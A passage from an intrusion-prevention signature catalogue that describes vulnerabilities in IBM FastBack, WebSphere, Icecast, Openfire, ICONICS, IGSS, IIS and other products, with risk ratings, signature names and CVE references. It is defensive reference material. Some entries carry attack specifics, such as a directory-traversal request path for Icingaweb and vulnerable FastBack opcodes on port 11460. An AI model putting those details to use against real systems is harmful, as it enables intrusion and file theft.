A buffer overflow vulnerability exists in IBM Tivoli Storage Manager FastBack Server. A remote unauthenticated attacker could exploit this vulnerability by sending crafted requests to port 11460/TCP. Successful exploitation results in arbitrary code execution within the context of System.

Situation:

Generic_CS-IBM-Tivoli-Storage-Manager-Fastback-Server-Buffer-Overflow-CVE-2015-1929

References:

CVE-2015-1929
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1929

IBM-Tivoli-Storage-Manager-Fastback-Server-Opcode-1301-Format-String-Vuln

About this vulnerability:

A vulnerability in IBM Tivoli Storage Manager FastBack

Risk:

Moderate

First detected in:

sgpkg-ips-712-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

IBM Tivoli Storage Manager FastBack

Type:

Format String

Description:

A crafted message may be used to exploit a format string vulnerability to gain the ability to execute arbitrary code on the target system.

Situation:

Generic_CS-IBM-Tivoli-Storage-Manager-Fastback-Server-Opcode-1301-Format-String-Vulnerability

References:

CVE-2015-1986
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1986

IBM-Tivoli-Storage-Manager-Fastback-Server-Opcode-1329-Buffer-Overflow

About this vulnerability:

A vulnerability in IBM Tivoli Storage Manager FastBack

Risk:

High

First detected in:

sgpkg-ips-710-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

IBM Tivoli Storage Manager FastBack

Type:

Buffer Overflow

Description:

A buffer overflow vulnerability exists in IBM Tivoli Storage Manager FastBack Server. The vulnerability is due to insufficient boundary checking on parameters in opcode 1329 requests. A remote unauthenticated attacker could exploit this vulnerability by sending crafted requests to port 11460/TCP. Successful exploitation results in arbitrary code execution within the security context of System.

Situation:

Generic_CS-IBM-Tivoli-Storage-Manager-Fastback-Server-Opcode-1329-Buffer-Overflow

References:

CVE-2015-1924
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1924

IBM-Tivoli-Storage-Manager-Fastback-Server-Opcode-1329-Directory-Traversal

About this vulnerability:

A vulnerability in IBM Tivoli Storage Manager FastBack

Risk:

Moderate

First detected in:

sgpkg-ips-705-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

IBM Tivoli Storage Manager FastBack

Type:

Directory Traversal

Description:

A directory traversal vulnerability allows an attacker to cause an information disclosure by sending a crafted request to the server.

Situation:

Generic_CS-IBM-Tivoli-Storage-Manager-Fastback-Server-Opcode-1329-Directory-Traversal

References:

CVE-2015-1941
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1941

IBM-Tivoli-Storage-Manager-Fastback-Server-Opcode-1330-Command-Injection

About this vulnerability:

A vulnerability in IBM Tivoli Storage Manager FastBack

Risk:

Moderate

First detected in:

sgpkg-ips-702-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

IBM Tivoli Storage Manager FastBack

Type:

Input Validation

Description:

Crafted requests can be used to exploit an input validation vulnerability and gain the ability to execute arbitrary commands.

Situation:

Generic_CS-IBM-Tivoli-Storage-Manager-Fastback-Server-Opcode-1330-Command-Injection

References:

CVE-2015-1949
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1949

IBM-Tivoli-Storage-Manager-Fastback-Server-Opcode-1331-Rmdir-Command-Injection

About this vulnerability:

A vulnerability in IBM Tivoli Storage Manager FastBack

Risk:

High

First detected in:

sgpkg-ips-693-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

IBM Tivoli Storage Manager FastBack

Type:

Input Validation

Description:

A command injection vulnerability exists in IBM Tivoli Storage Manager FastBack Server. The vulnerability is due to insufficient input validation of parameters in opcode 1331 requests. A remote unauthenticated attacker can exploit this vulnerability by sending crafted requests to port 11460/TCP. Successful exploitation results in arbitrary command execution within the security context of System.

Situation:

Generic_CS-IBM-Tivoli-Storage-Manager-Fastback-Server-Opcode-1331-Rmdir-Command-Injection

References:

CVE-2015-1923
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1923

IBM-Tivoli-Storage-Manager-Fastback-Server-Opcode-1332-Buffer-Overflow

About this vulnerability:

A vulnerability in IBM Tivoli Storage Manager FastBack

Risk:

High

First detected in:

sgpkg-ips-695-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

IBM Tivoli Storage Manager FastBack

Type:

Buffer Overflow

Description:

A buffer overflow vulnerability exists in IBM Tivoli Storage Manager FastBack Server. The vulnerability is due to insufficient boundary checking on parameters in opcode 1332 requests. A remote unauthenticated attacker could exploit this vulnerability by sending crafted requests to port 11460/TCP. Successful exploitation results in arbitrary code execution within the context of System.

Situation:

Generic_CS-IBM-Tivoli-Storage-Manager-Fastback-Server-Opcode-1332-Buffer-Overflow

References:

CVE-2015-1925
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1925

IBM-Tivoli-Storage-Manager-Fastback-Server-Opcode-4115-Buffer-Overflow

About this vulnerability:

A vulnerability in IBM Tivoli Storage Manager FastBack

Risk:

High

First detected in:

sgpkg-ips-726-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

IBM Tivoli Storage Manager FastBack

Type:

Buffer Overflow

Description:

A buffer overflow vulnerability exists in IBM Tivoli Storage Manager FastBack Server. A remote attacker could exploit the system opcode 4115 with crafted requests and execute arbitrary code in the target environment.

Situation:

Generic_CS-IBM-Tivoli-Storage-Manager-Fastback-Server-Opcode-4115-Buffer-Overflow

References:

CVE-2015-4931
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4931

BID-76107
http://www.securityfocus.com/bid/76107

IBM-TM1-Planning-Analytics-Remote-Code-Execution

About this vulnerability:

An attempt to exploit a vulnerability in IBM TM1 Planning Analytics detected

Risk:

High

First detected in:

sgpkg-ips-1406-5242

Last changed:

sgpkg-ips-1406-5242

Platform:

Generic

Software:

IBM TM1

Type:

Malfunction

Description:

An attempt to exploit a vulnerability in IBM TM1 Planning Analytics detected.

Situation:

Generic_TCP-IBM-TM1-Planning-Analytics-Remote-Code-Execution

References:

CVE-2019-4716
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-4716

IBM-WebSphere-Application-Server-Authentication-Buffer-Overflow

About this vulnerability:	Buffer overflow vulnerability in the authentication process of IBM WebSphere Application Server
Risk:	High
First detected in:	sgpkg-ips-66-1210
Last changed:	sgpkg-ips-1589-5242
Platform:	Generic
Software:	IBM WebSphere Application Server
Type:	Buffer Overflow
Description:	IBM WebSphere Application Server has a vulnerability in the handling of user-supplied credentials in a form-based authentication. The length of the user-supplied value given either to variable j_username or j_password is not properly checked before the value is copied into a fixed size buffer. A remote attacker is able to cause a buffer overflow condition and possibly execute arbitrary code on the victim server.
Situation:	HTTP_CRL-IBM-WebSphere-Application-Server-Authentication-Buffer-Overflow

IBM-WebSphere-Application-Server-Remote-Code-Execution

About this vulnerability:

A vulnerability in IBM WebSphere Application Server

Risk:

High

First detected in:

sgpkg-ips-705-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

IBM WebSphere Application Server

Type:

Malfunction

Description:

There exists a remote code execution vulnerability in IBM WebSphere Application Server. A remote attacker can use this to execute arbitrary code in the security context of the System user.

Situation:

File-TextId_IBM-WebSphere-Application-Server-Remote-Code-Execution
File-TextId_IBM-WebSphere-Application-Server-Remote-Code-Execution-2

References:

CVE-2015-7450
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7450

IBM-WebSphere-Application-Server-SIP-Processing-Denial-Of-Service

About this vulnerability:

A vulnerability in IBM WebSphere Application Server

Risk:

Moderate

First detected in:

sgpkg-ips-796-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

IBM WebSphere Application Server

Type:

Input Validation

Description:

Improper validation of SIP messages leads to a vulnerability that can be exploited to cause a denial of service condition.

Situation:

SIP-UDP_IBM-WebSphere-Application-Server-SIP-Processing-Denial-Of-Service

References:

CVE-2016-2960
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2960

IBM-WebSphere-Waspostparam-Cookie-Untrusted-Java-Deserialization

About this vulnerability:

A vulnerability in IBM WebSphere Application Server

Risk:

Moderate

First detected in:

sgpkg-ips-813-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

IBM WebSphere Application Server

Type:

Malfunction

Description:

A malicious WASPostParam value containing serialized Java objects can be used to exploit the IBM WebSphere Application Server. Successful exploitation can allow arbitrary code execution on the target.

Situation:

HTTP_CSH-IBM-WebSphere-Waspostparam-Cookie-Untrusted-Java-Deserialization

References:

CVE-2016-5983
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5983

Icecast-Server-Base64-Authorization-Request-BOF

About this vulnerability:

Buffer overflow in Icecast server base64 authorization

Risk:

Moderate

First detected in:

sgpkg-ips-14-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Icecast

Type:

Buffer Overflow

Description:

Icecast mp3 broadcasting server is vulnerable to a heap-based buffer overflow. By sending a specially-crafted base64 authorization request, a remote attacker could overflow a buffer and possibly execute arbitrary code on the system or cause the system to crash.

Situation:

HTTP_CS-Icecast-Server-Base64-Authorization-BOF

References:

CVE-2004-2027
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2027

BID-10311
http://www.securityfocus.com/bid/10311

OSVDB-6075
http://www.osvdb.org/6075

Icecast-Server-HTTP-Header-BOF

About this vulnerability:

Buffer overflow in Icecast streaming server

Risk:

High

First detected in:

sgpkg-ips-338-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Icecast

Type:

Buffer Overflow

Description:

Icecast mp3 streaming server versions 2.0.1 and prior running on Microsoft Windows are vulnerable to a buffer overflow, caused by improper bounds checking of user-supplied input when processing HTTP headers. By sending more than 31 headers in a HTTP request to Icecast, a remote attacker can overflow a buffer and execute arbitrary code on the system.

Situation:

HTTP_CS-Icecast-Multiple-Header-Line-Buffer-Overflow

References:

CVE-2004-1561
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1561

BID-11271
http://www.securityfocus.com/bid/11271

OSVDB-10446
http://www.osvdb.org/10446

IcedID-Trojan-Infection-Traffic

About this vulnerability:	IcedID trojan infection traffic
Risk:	High
First detected in:	sgpkg-ips-1371-5242
Last changed:	sgpkg-ips-1371-5242
Platform:	Windows
Software:	<os>
Type:	Backdoor
Description:	IcedID trojan infection traffic was detected. IcedID has information stealing capabilities and can also act as a dropper for other malware.
Situation:	HTTP_CSH-IcedID-Trojan-Infection-Traffic

Icingaweb-Directory-Traversal-In-Static-Library-File-Requests

About this vulnerability:

A vulnerability in Icingaweb.

Risk:

High

First detected in:

sgpkg-ips-1596-5242

Last changed:

sgpkg-ips-1596-5242

Platform:

Linux

Software:

Icingaweb

Type:

Input Validation

Description:

A vulnerability in Icingaweb, versions 2.9.0 to 2.9.5, and 2.8.0 to 2.8.5, which allows remote attackers to retrieve arbitrary files from the targets filesystem via a GET request to /lib/icinga/icinga-php-thirdparty/<absolute path to target file on disk>.

Situation:

HTTP_CRL-Icingaweb-Directory-Traversal-In-Static-Library-File-Requests

References:

CVE-2022-24716
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-24716

ICL-ScadaFlex-II-SCADA-Controllers-Remote-File-Modification

About this vulnerability:

A vulnerability in ICL ScadaFlex II SCADA Controllers.

Risk:

High

First detected in:

sgpkg-ips-1578-5242

Last changed:

sgpkg-ips-1578-5242

Platform:

Generic

Software:

ICL ScadaFlex

Type:

Insecure Configuration

Description:

A vulnerability in ICL ScadaFlex II SCADA Controllers SC-1/SC-2, version 1.03.07, which allows remote attackers to write, overwrite, or delete files on a target system which could lead to futher access, due to the lack of authentication.

Situation:

HTTP_CS-ICL-ScadaFlex-II-SCADA-Controllers-Remote-File-Modification

References:

CVE-2022-25359
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-25359

ICMP-Connection-Reset-Denial-Of-Service

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

Moderate

First detected in:

sgpkg-ips-753-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows 2000; Windows 98; Windows ME; Windows XP; Windows 2003

Software:

<os>

Type:

Insecure Configuration

Description:

Situation:

ICMP_Connection-Reset-Denial-Of-Service

References:

CVE-2004-0790
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0790

BID-13124
http://www.securityfocus.com/bid/13124

ICMP-DoS-Jolt-Vulnerability

About this vulnerability:

Framgented ICMP packet may cause Denial of Service

Risk:

Low

First detected in:

sgpkg-ips-253-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows; Solaris; Linux

Software:

<os>

Type:

Malfunction

Description:

A vulnerability in the handling of fragmented IP ICMP packets may cause the system to crash or become unavailable. The vulnerability exists in multiple operating systems including some versions of Linux, Solaris and Windows. Other operating systems may also be vulnerable. Attack tools (jolt, targa) to exploit this vulnerability are publicly available in the internet. See CVE-2002-107 and CVE-2002-0880 for related vulnerabilities.

Situation:

DOS_JOLT

References:

CVE-1999-0345
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0345

ICMP-DoS-ZyXEL-Jolt-Vulnerability

About this vulnerability:

Multiple Vendor Fragmented IP Packets DoS Vulnerability

Risk:

Low

First detected in:

sgpkg-ips-253-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Software:

ZyXEL Prestige

Type:

Malfunction

Description:

Transmitting identical fragmented jolt-style IP Packets to a ZyXEL Prestige device causes a Denial of Service. See also CVE-1999-0345.

Situation:

DOS_JOLT
IMAP_Excessively-Long-Mailbox-Name-Argument-In-IMAP-Append-Command

References:

CVE-2002-1072
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1072

BID-5292
http://www.securityfocus.com/bid/5292

ICMP-Microsoft-Windows-Kernel-ICMP-Fragmented-Packet-DOS

About this vulnerability:

Framgented ICMP packet may cause Denial of Service

Risk:

Moderate

First detected in:

sgpkg-ips-395-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

There exists a denial of service vulnerability in the way Microsoft Windows Kernel processes ICMP requests. The vulnerability is due to insufficient boundary checking when processing fragmented router advertisement ICMP requests. Remote unauthenticated attackers can exploit this vulnerability by sending specially crafted ICMP messages to an affected system. Successful exploitation may cause the system to stop responding. By exploiting this vulnerability, the vulnerability will cause windows kernel panic and finally the vulnerable Windows system will crash to cause a denial of service condition. In such case, the target host must be restarted to resume its functionality.

Situation:

IP_Fragment-Invalid-Size

References:

CVE-2007-0066
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0066

BID-27139
http://www.securityfocus.com/bid/27139

MS08-001
http://technet.microsoft.com/security/bulletin/MS08-001

ICMP-Source-Quench-Denial-Of-Service

About this vulnerability:

A deprecated ICMP message type

Risk:

Moderate

First detected in:

sgpkg-ips-755-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

<os>

Type:

Insecure Configuration

Description:

ICMP Source Quench was intended to be used to decrease the traffic rate of data in network streams. The method has been found ineffective and was deprecated as of RFC 6633 and can be considered as malicious.

Situation:

ICMP_Source-Quench-Denial-Of-Service

References:

CVE-2004-0791
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0791

BID-13124
http://www.securityfocus.com/bid/13124

iCMS-admincp.php-SQL-Injection

About this vulnerability:

A vulnerability in iCMS

Risk:

Moderate

First detected in:

sgpkg-ips-1380-5242

Last changed:

sgpkg-ips-1380-5242

Platform:

Generic

Software:

iCMS

Type:

Input Validation

Description:

There exists an SQL injection vulnerability in iCMS version 7.0.8. Successful exploitation could lead in the execution of arbitrary SQL statements via a maliciously crafted request to admincp.php.

Situation:

HTTP_CS-iCMS-admincp.php-SQL-Injection

References:

CVE-2018-12498
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12498

ICONICS-Dialog-Wrapper-Module-ActiveX-Control-Buffer-Overflow

About this vulnerability:

A vulnerability in ICONICS Dialog Wrapper

Risk:

High

First detected in:

sgpkg-ips-609-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

ICONICS Dialog Wrapper

Type:

Malfunction

Description:

There is a buffer overflow vulnerability the DlgWrapper.dll ActiveX control in ICONICS Dialog Wrapper which allows remote attackers to execute arbitrary code.

Situation:

File-Text_ICONICS-Dialog-Wrapper-Module-ActiveX-Control--Overflow

References:

CVE-2006-6488
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6488

BID-21849
http://www.securityfocus.com/bid/21849

OSVDB-32552
http://www.osvdb.org/32552

ICONICS-Genesis-Denial-of-Service

About this vulnerability:	A vulnerability in ICONICS Genesis
Risk:	Moderate
First detected in:	sgpkg-ips-619-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	ICONICS Genesis
Type:	Malfunction
Description:	An memory corruption vulnerability in Iconics GENESIS allows denial of service.
Situation:	Generic_CS-ICONICS-Genesis-Denial-Of-Service

ICONICS-Genesis-Integer-Overflow

About this vulnerability:	A vulnerability in ICONICS Genesis
Risk:	Moderate
First detected in:	sgpkg-ips-619-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	ICONICS Genesis
Type:	Integer Overflow
Description:	An Integer Overflow vulnerability in Iconics GENESIS allows remote code execution.
Situation:	Generic_CS-ICONICS-Genesis-Integer-Overflow

ICONICS-Modbus-DoS

About this vulnerability:	A vulnerability in Iconics OPC Modbus Ethernet Server
Risk:	High
First detected in:	sgpkg-ips-613-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows;Linux
Software:	Modbus SCADA
Type:	Malfunction
Description:	A vulnerability exists in Iconics OPC Modbus Ethernet Server which allows for a DoS attack.
Situation:	Generic_SS-ICONICS-Modbus-DoS

ICONICS-WebHMI-ActiveX-Control-Stack-Buffer-Overflow-Vulnerability

About this vulnerability:

A vulnerability in ICONICS WebHMI

Risk:

Moderate

First detected in:

sgpkg-ips-568-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

ICONICS WebHMI

Type:

Buffer Overflow

Description:

The ICONICS WebHMI ActiveX control is prone to a remote stack-based buffer-overflow vulnerability that affects the 'GenVersion.dll' ActiveX control. Attackers can exploit this issue to execute arbitrary code within the context of an application (typically Internet Explorer) that uses the ActiveX control. Failed exploit attempts will result in a denial-of-service condition.

Situation:

File-Text_ICONICS-WebHMI-ActiveX-Control-Stack-Buffer-Overflow-Vulnerability
File-Text_ICONICS-WebHMI-ActiveX-Control-Stack-Buffer-Overflow-Vulnerability-2

References:

CVE-2011-2089
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2089

BID-47704
http://www.securityfocus.com/bid/47704

OSVDB-72135
http://www.osvdb.org/72135

Iconv-ISO-2022-CN-EXT-Buffer-Overflow-CVE-2024-2961

About this vulnerability:

An attempt to exploit a vulnerability in PHP detected

Risk:

High

First detected in:

sgpkg-ips-1837-5242

Last changed:

sgpkg-ips-1837-5242

Platform:

Generic

Software:

PHP

Type:

Input Validation

Description:

The iconv() function in the GNU C Library versions 2.39 and older may overflow the output buffer passed to it by up to 4 bytes when converting strings to the "ISO-2022-CN-EXT" character set. This may be used to crash an application or overwrite a neighbouring variable.

Situation:

HTTP_CRL-Iconv-ISO-2022-CN-EXT-Buffer-Overflow-CVE-2024-2961

References:

CVE-2024-2961
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-2961

ICQ-Instant-Messenger-Network-Usage

About this vulnerability:	ICQ instant messenger network usage
Risk:	Moderate
First detected in:	sgpkg-ips-21-1210
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	ICQ
Type:	Instant Messenger
Description:	ICQ is an instant messenger network that can be used to send messages and share files among users.
Situation:	IM-TCP_ICQ-Network-Login

ICSCADA-SQL-Injection

About this vulnerability:	A vulnerability in ICSCADA
Risk:	High
First detected in:	sgpkg-ips-609-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	ICSCADA
Type:	SQL Injection
Description:	There is an SQL injection vulnerability in ICSCADA.
Situation:	HTTP_CRL-ICSCADA-SQL-Injection

IDAutomation-Barcode-ActiveX-Components-File-Write

About this vulnerability:

A vulnerability in IDAutomation Barcode ActiveX Components

Risk:

High

First detected in:

sgpkg-ips-163-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

IDAutomation Barcode ActiveX

Type:

Malfunction

Description:

There is an arbitrary file write vulnerability in various IDAutomation Barcode ActiveX controls. The ActiveX component does not validate filename parameters in any way allowing a remote attacker to write files in the system as permitted by the privileges of the current user.

Situation:

HTTP_SS-IDAutomation-Barcode-ActiveX-Components-File-Write
File-Text_IDAutomation-Barcode-ActiveX-Components-File-Write

References:

CVE-2008-2283
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2283

BID-29204
http://www.securityfocus.com/bid/29204

Ie-Cross-Domain-Frame-Spoof

About this vulnerability:

Cross domain frame spoofing vulnerability in MS IE

Risk:

Low

First detected in:

sgpkg-ips-1008-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 4.0; Internet Explorer 5.0; Internet Explorer 6.0; Internet Explorer 5.5

Type:

Malfunction

Description:

Internet Explorer web browser has a cross-domain frame loading vulnerability. It is reported that if the name of a frame rendered in a target site is known, then an attacker may potentially render arbitrary HTML in the frame of the target site. An attacker may exploit this vulnerability to spoof an interface of a trusted web site.

Situation:

File-GIF_Ie-Cross-Domain-Frame-Spoof

References:

CVE-2004-0719
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0719

BID-855
http://www.securityfocus.com/bid/855

OSVDB-7296
http://www.osvdb.org/7296

Ie-Object-Type-Property-BOF

About this vulnerability:

Internet Explorer object type property buffer overflow

Risk:

High

First detected in:

sgpkg-ips-132-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Buffer Overflow

Description:

A buffer overflow exists in the HTML-parser within some windows systems. This can be exploited via multiple attack vectors. A successful exploit leads remote compromise of the client.

Situation:

HTTP_SS-Microsoft-Internet-Explorer-Object-Tag-Slash-Buffer-Overflow
File-Text_Microsoft-Internet-Explorer-Object-Tag-Slash-Buffer-Overflow

References:

CVE-2003-0344
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0344

BID-7806
http://www.securityfocus.com/bid/7806

OSVDB-2967
http://www.osvdb.org/2967

MS03-020
http://technet.microsoft.com/security/bulletin/MS03-020

IEPlugin

About this vulnerability:	IEPlugin browser plugin
Risk:	Low
First detected in:	sgpkg-ips-33-1210
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	IEPlugin
Type:	Misconfiguration
Description:	This browser plugin may be considered unwanted software by some organizations. It may display advertisement popups and/or send information to its company.
Situation:	HTTP_CSH-IEPlugin

IGEL-OS-Secure-VNC-Terminal-Command-Injection

About this vulnerability:	A vulnerability in IGEL OS.
Risk:	High
First detected in:	sgpkg-ips-1364-5242
Last changed:	sgpkg-ips-1364-5242
Platform:	Generic
Software:	IGEL OS
Type:	Input Validation
Description:	A vulnerability in IGEL OS which allows remote attackers to execute arbitrary code through the Secure Terminal and Secure Shadow services.
Situation:	Generic_CS-IGEL-OS-Secure-VNC-Terminal-Command-Injection

Ignite-Realtime-OpenFire-Admin-Console-Authentication-Bypass

About this vulnerability:

An Ignite Realtime OpenFire Admin Console Authentication Bypass vulnerability

Risk:

High

First detected in:

sgpkg-ips-796-5211

Last changed:

sgpkg-ips-1638-5242

Platform:

Generic

Software:

Ignite Realtime Openfire

Type:

Directory Traversal

Description:

A vulnerability in Ignite Realtime Openfire, versions 3.6.0a and before, which allows remote attackers to read arbitrary files via a dot dot sequence directory traversal in a URI that matches the Exclude-Strings list.

References:

CVE-2008-6508
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-6508

BID-32189
http://www.securityfocus.com/bid/32189

OSVDB-49663
http://www.osvdb.org/49663

Ignite-Realtime-OpenFire-Group-summary.jsp-Cross-Site-Scripting

About this vulnerability:

A vulnerability in Ignite Realtime Openfire

Risk:

Moderate

First detected in:

sgpkg-ips-688-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Ignite Realtime Openfire

Type:

Input Validation

Description:

A cross-site scripting vulnerability has been reported in Ignite Realtime Openfire Server. The vulnerability is due to insufficient validation of the "search" parameter within the group-summary.jsp page. By convincing an authenticated user to visit a malicious website, a remote attacker can exploit the XSS vulnerability to execute arbitrary scripts in the user's browser session with the security context of the affected server.

Situation:

HTTP_CRL-Ignite-Realtime-OpenFire-Group-summary.jsp-Cross-Site-Scripting

References:

CVE-2015-6972
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6972

Ignite-Realtime-OpenFire-Server-props.jsp-Cross-Site-Request-Forgery

About this vulnerability:

A vulnerability in Ignite Realtime Openfire

Risk:

Moderate

First detected in:

sgpkg-ips-696-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Ignite Realtime Openfire

Type:

Input Validation

Description:

A cross-site request forgery vulnerability has been reported in Openfire's server-props.jsp script. The vulnerability is due to insufficient CSRF protections. A remote, unauthenticated attacker can exploit this vulnerability by enticing a user with administrative privileges to visit a page which sends a request to server-props.jsp. Successful exploitation can result in attacker-controlled changes to server properties.

Situation:

HTTP_CS-Ignite-Realtime-OpenFire-Server-props.jsp-Cross-Site-Request-Forgery

References:

CVE-2015-6973
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6973

Ignite-Realtime-OpenFire-Server-XSS

About this vulnerability:	A vulnerability in Ignite Realtime Openfire
Risk:	Moderate
First detected in:	sgpkg-ips-686-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Ignite Realtime Openfire
Type:	Input Validation
Description:	There is a cross-site scripting vulnerability in Ignite Realtime Openfire Server. By directing an administrator to a controlled website via the vulnerability, an attacker can exploit the cross-site scripting vulnerability for command execution in the user's browser.
Situation:	HTTP_CRL-Ignite-Realtime-OpenFire-Server-XSS

Ignite-Realtime-OpenFire-User-create.jsp-Cross-Site-Request-Forgery

About this vulnerability:

A vulnerability in Ignite Realtime Openfire

Risk:

High

First detected in:

sgpkg-ips-693-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Ignite Realtime Openfire

Type:

Input Validation

Description:

A cross-site request forgery vulnerability has been reported in Openfire's user-create.jsp script. The vulnerability is due to insufficient CSRF protections. A remote, unauthenticated attacker can exploit this vulnerability by enticing a user with administrator privileges to visit a page which sends a request to user-create.jsp. Successful exploitation can result in adding arbitrary users.

Situation:

HTTP_CS-Ignite-Realtime-OpenFire-User-create.jsp-Cross-Site-Request-Forgery

References:

CVE-2015-6973
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6973

Ignite-Realtime-OpenFire-User-password.jsp-Cross-Site-Request-Forgery

About this vulnerability:

A vulnerability in Ignite Realtime Openfire

Risk:

Moderate

First detected in:

sgpkg-ips-690-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Ignite Realtime Openfire

Type:

Input Validation

Description:

A cross-site request forgery vulnerability has been reported in Openfire user-password.jsp. The vulnerability is due to insufficient CSRF protections. A remote, unauthenticated attacker can exploit this vulnerability by enticing a user with administrative privileges to visit a page which sends a request to user-password.jsp. Successful exploitation can result in administrator password change.

Situation:

HTTP_CS-Ignite-Realtime-OpenFire-User-password.jsp-Cross-Site-Request-Forgery

References:

CVE-2015-6973
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6973

Ignite-Realtime-OpenFire-Version-3.7.1-Reflected-XSS

About this vulnerability:

An attempt to exploit a vulnerability in Ignite Realtime Openfire detected

Risk:

High

First detected in:

sgpkg-ips-1867-5242

Last changed:

sgpkg-ips-1867-5242

Platform:

Generic

Software:

Ignite Realtime Openfire

Type:

Malfunction

Description:

Ignite Realtime Openfire before 3.9.2 is vulnerable to cross-site scripting, caused by improper validation of user-supplied input. A remote attacker could exploit this vulnerability via a crafted URL to execute script in a victim's Web browser within the security context of the hosting Web site, once the URL is clicked. An attacker could use this vulnerability to steal the victim's cookie-based authentication credentials.

Situation:

HTTP_CRL-Ignite-Realtime-OpenFire-Version-3.7.1-Reflected-XSS

References:

CVE-2018-11688
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11688

IGSS-DataServer-Denial-Of-Service

About this vulnerability:	IGSSdataServer.exe version 9.00.00.11063 and older denial of service.
Risk:	High
First detected in:	sgpkg-ips-628-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	IGSS Server
Type:	Malfunction
Description:	A vulnerability in IGSS DataServer that allows an attacker to crash the service by sending a specially crafted tcp packet.
Situation:	Generic_CS-IGSS-DataServer-Denial-Of-Service

IGSS-ODBC-Server-Denial-Of-Service

About this vulnerability:	IGSS odbc scada server denial of service.
Risk:	High
First detected in:	sgpkg-ips-628-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	IGSS Server
Type:	Malfunction
Description:	A vulnerability in IGSS ODBC Server that allows an attacker to crash the service by sending a specially crafted tcp packet.
Situation:	Generic_CS-IGSS-ODBC-Server-Denial-Of-Service

IIS-Ftpd-Wildcard-Expansion-DoS

About this vulnerability:

IIS ftpd wildcard expansion dos

Risk:

Low

First detected in:

sgpkg-ips-1-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

IIS 5.0

Type:

Resource Starvation

Description:

A wildcard sequence that generates a long string when expanded may lead into resource starvation and thus into denial of service. Affected versions are ftp daemons in IIS 5.0 and before.

Situation:

FTP_CS-IIS-DoS-Wildcard

References:

CVE-2001-0334
